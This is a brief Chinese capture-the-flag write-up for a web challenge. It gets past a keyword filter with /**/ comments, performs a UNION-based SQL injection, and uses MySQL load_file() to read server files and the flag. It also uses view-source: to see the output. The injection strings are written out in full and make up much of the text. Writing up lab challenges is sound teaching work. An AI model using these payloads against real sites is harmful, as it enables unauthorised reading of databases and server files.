题目描述:无
解题思路
这道题比较简单,分值也只有5分,就是一个简单的sql注入。但是这个sql注入的回显你得看它的源代码里才有。但是它把你右击查看源码那个玩意儿给禁了。你需要在你的url前面加view-source:才能看到源码
解题过程,首先打开题目,它的传参是c,值有1,有2,有3,有44444,也有3333。我一个一个试着传了一下。
传了一个?c=3的时候,弹出下图。有敏感字符呀,我还以为一访问就出来flag了,没想到
出来个这页面,这种页面基本可以判断它就是个sql注入
我们直接点确定,查询一下1这个值,url这样
我们在看一下这条语句能弹出啥,结果发现啥也没
-1 select version()
它好像做过滤了,我用字符绕了一下,成功弹出version值
-1/**/union/**/select/**/version()
这种题我们直接读一下,它当前这个网页文件here_1s_your_f1ag.php可能就能出来flag,我们用函数load_file读一下
-1/**/union/**/select/**/load_file('/var/www/html/here_1s_your_f1ag.php')
-1/**/union/**/select/**/load_file('/var/www/html/index.php') 也没有东西
这儿还有一个secret.php,我们读一读
-1/**/union/**/select/**/load_file('/var/www/html/secret.php')
读出一个real_flag_is_here,我们读取一下
-1/**/union/**/select/**/load_file('/real_flag_is_here')
拿到flag(注意每次sql注入完,查看注入结果是需要在url前加view-source: )